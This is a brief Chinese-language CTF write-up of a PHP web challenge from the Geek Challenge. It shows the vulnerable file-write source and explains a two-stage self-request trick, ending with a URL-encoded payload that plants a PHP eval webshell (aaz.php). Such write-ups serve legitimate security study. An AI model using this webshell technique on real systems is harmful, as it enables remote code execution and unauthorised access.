把早期的web题刷一刷,把其中一些比较好的给记录下来以便整理、学习
第七季极客大挑战
<?php if(isset($_GET) && !empty($_GET)){ $url = $_GET['file']; $path = "upload/".$_GET['path']; }else{ show_source(__FILE__); exit(); } if(strpos($path,'..') > -1){ die('SYCwaf!'); } if(strpos($url,'http://127.0.0.1/') === 0){ file_put_contents($path, file_get_contents($url)); echo "console.log($path update successed!)"; }else{ echo "Hello.Geeker"; }题目分析: 我们,整个题目的输入只有两个地方path和file我们要构造的payload也只能从这两个地方传入。两个参数的作用很简单这里就不说了。 我们的目的是将我的文件内容写入文件,发现了他会把path打印出来 因此我们想到利用二次传参,第一层将我们要写的内容打印出来,第二层将打印的内容写入文件 http://127.0.0.1/2.php?path=&file=http://127.0.0.1/ http://127.0.0.1/2.php?path=jj.php&file=http://127.0.0.1/2.php?path=&file=http://127.0.0.1/注意二次编码 最后提交 http://127.0.0.1/2.php?path=aaz.php&file=http://127.0.0.1/2.php?path=%3C%3Fphp%20@eval%28%24_POST%5B1%5D%29%3B%3F%3E&file=http://127.0.0.1/ 然后访问aaz.php
